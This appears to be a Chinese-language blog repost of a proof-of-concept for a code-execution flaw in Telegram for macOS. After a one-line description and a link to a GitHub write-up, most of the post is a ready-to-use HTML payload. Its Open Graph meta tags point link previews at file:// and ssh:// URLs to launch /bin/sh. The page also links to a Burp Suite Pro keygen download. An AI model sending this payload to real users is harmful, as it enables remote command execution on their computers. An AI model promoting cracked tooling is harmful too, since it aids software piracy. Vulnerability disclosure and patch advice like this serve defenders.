Telegram(macOS v4.9.155353) 代码执行漏洞 PoC


Telegram 是啥不多说:看到了的赶紧更新吧。

详情看GitHub:https://github.com/Metnew/telegram-links-nsworkspace-open

给你发送一个超链接,包含恶意嵌套代码标签,导致命令执行。

POC 如下:

<html>

</head>
    <!--<meta property="og:url"   content="%A0file://google.com/bin/sh" /> Keybase-->
    <meta property="og:url"   content="file://google.com/bin/sh" />
    <meta property="og:type"  content="article" />
    <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
    <meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " />
</head>

</html>

手机扫码阅读

burpsuite_pro_v2.1.07.jar及burp-loader-keygen-2_1_07.jar下载

解决nginx 反代 tomcat 应用不能获取到正确域名

评 论
avatar
文章不错支持一下吧
2020-01-31 23:21 回复
avatar
文章不错非常喜欢
2020-01-24 01:32 回复
avatar
网站内容还是挺不错的,谢谢博主。还有博客应该是WORDPRESS做的吧,感觉美观度还可以提高,谢谢。我自已是搞前端设计的,你的代码可以做精简一点。
2020-01-08 10:18 回复
avatar
@广州技校:谢谢
2020-01-27 12:45 回复